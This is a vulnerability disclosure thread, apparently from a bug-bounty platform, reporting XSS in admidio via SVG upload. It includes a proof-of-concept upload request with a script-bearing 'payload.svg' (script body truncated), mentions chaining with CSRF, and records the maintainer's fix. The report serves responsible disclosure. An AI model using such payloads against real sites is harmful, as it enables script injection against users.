Cross-site Scripting (XSS) - Reflected in admidio/admidio


Reported on

Oct 17th 2021


Am still able to reproduce the SVG-XSS vulnerability here on my local system (just downloaded the latest release on the website. Think you may have accidentally included SVG files into the whitelist.

Proof of Concept

POST /admidio/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=6 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------105596666835784551932184244642
Content-Length: 571
Connection: close
Cookie: ADMIDIO_INSTALLATION_SESSION_ID=ajhu2uaaoaha7fk8vpdv165kao; ADMIDIO_abc_db_adm_SESSION_ID=r1pltsf7bp9fodrffonheefdnd; 'ADMIDIO_abc_db_adm_cookieconsent_status=dismiss; OJSSID=4bbfi99a73d9r0f5jm94irg6ls; PHPSESSID=3l4k4gsg30qn5ed2al4un9l5j7

Content-Disposition: form-data; name="files[]"; filename="payload.svg"
Content-Type: image/svg+xml
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">


This vulnerability is capable of reflected XSS via upload of malicious SVG files

Note: Can be chained with CSRF to perform XSS without the need of upload privileges.

We have contacted a member of the admidio team and are waiting to hear back 2 months ago
We have contacted a member of the admidio team and are waiting to hear back 2 months ago
haxatron submitted a
2 months ago
2 months ago


Patch fix here:
Fix should treat SVG as attachments instead of inline files, preventing XSS issue...

2 months ago


My apologies, please ignore the patchfix as I dont think its complete

2 months ago


dont think its correct*

Markus Faßbender validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
2 months ago

I add the whitelist after I fix the original post from you and than don't check the whitelist against svg :-( Now I removed SVG from the whitelist.

Markus Faßbender confirmed that a fix has been merged on 4f1539 2 months ago
Markus Faßbender has been awarded the fix bounty